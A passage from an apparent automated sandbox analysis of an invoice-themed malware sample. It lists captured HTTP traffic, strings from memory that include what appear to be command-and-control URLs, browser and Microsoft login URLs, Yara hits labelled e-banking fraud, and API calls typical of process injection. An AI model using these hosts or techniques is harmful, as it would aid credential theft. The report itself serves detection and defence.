6e 6f 74 
66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:19 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 
3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:38 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 
4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:30:41 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 1168 Content-Type: text/html; charset=UTF-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:30:43 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 1168 Content-Type: text/html; charset=UTF-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:30:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d7a530c0bb2ea02-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:30:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d7a531bfb01e5c2-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:31:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding x-powered-by: WP Engine Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d7a532bdfc4e510-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:31:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCHOoxPsJaPWs9EBkOG%2F0B%2FjJzSPfqRpowV44KZX77grvGMuWFrh%2BGp%2FPjmcD4VLxKermaFoMY2CCeff3gWmRdsKnObkJmeUTau1qK%2FTHvMBN68wNO5lw3IVzhihiIOtlfCtlYuFbeA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7a54067a6345fb-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=691&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:31:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XoHLcYZuLwxjhLPCIUxlwo86rJWge7qcg2vCsH8CElroyIesz%2FpaGU%2FqTHIz%2F3%2FongVCEeCw44LaYQIaCfx1NH%2BYcIpl25H3ESRGflrn02lS3QDpphriAxuqP0wuWaBRmRQ64V4jf4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7a54165977464e-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:31:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqoyXcAqf%2FeGAMp%2FmLm3K5Qrz8imcU57RBqdHCnhQgvEdeHB%2F1O32xmLFvg6IvUMr%2BwaUdIInu4i44RLtbtEohBXrfMjXZ8N4UbDZl6oKNxv8v%2FsgWt5r1pHXWS%2FREC0FcP2hp1TEDU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7a54266c6b83a1-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1378&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1728&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 19
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 13:31:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ET%2BJwMAwEgYpZKAkdNYkPt7KcevZM9KfP8gYRXHpemXgxm8fA3c01KUXGl8XP0qazUPrLPrVikGuFgyuPB5PT9hgmBy6%2BvG6bHw700W7XuucYu0wDKVRKv7s%2BYoub9xqZ3Nk0ZemaE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7a54362aeba91e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:31:50 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:31:53 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:31:56 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Oct 2024 13:31:58 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.000000000485C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.000000000401C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.00000000049EE000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.00000000041AE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://meanttobebroken.org/zdt7/?pZxtux=OdyTsfpKOp
                Source: Due Payment Invoice PISS2024993.exe String found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: cJjnESPXORw.exe, 00000005.00000002.3915813020.00000000062CE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ak711ka10.lat
                Source: cJjnESPXORw.exe, 00000005.00000002.3915813020.00000000062CE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ak711ka10.lat/o5z9/
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.0000000004538000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.0000000003CF8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:400
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 00000006.00000003.2595134579.0000000007A2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.00000000043A6000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.0000000003B66000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.shintow.net/ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze

                E-Banking Fraud

                Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: Due Payment Invoice PISS2024993.exe
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe Code function: 0_2_098D2CA8 NtQueryInformationProcess,0_2_098D2CA8
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe Code function: 0_2_098D2CA0 NtQueryInformationProcess,0_2_098D2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0042C403 NtClose,3_2_0042C403
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022B60 NtClose,LdrInitializeThunk,3_2_01022B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01022DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01022C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010235C0 NtCreateMutant,LdrInitializeThunk,3_2_010235C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01024340 NtSetContextThread,3_2_01024340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01024650 NtSuspendThread,3_2_01024650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022B80 NtQueryInformationFile,3_2_01022B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022BA0 NtEnumerateValueKey,3_2_01022BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022BE0 NtQueryValueKey,3_2_01022BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022BF0 NtAllocateVirtualMemory,3_2_01022BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022AB0 NtWaitForSingleObject,3_2_01022AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022AD0 NtReadFile,3_2_01022AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022AF0 NtWriteFile,3_2_01022AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022D00 NtSetInformationFile,3_2_01022D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022D10 NtMapViewOfSection,3_2_01022D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022D30 NtUnmapViewOfSection,3_2_01022D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022DB0 NtEnumerateKey,3_2_01022DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022DD0 NtDelayExecution,3_2_01022DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022C00 NtQueryInformationProcess,3_2_01022C00
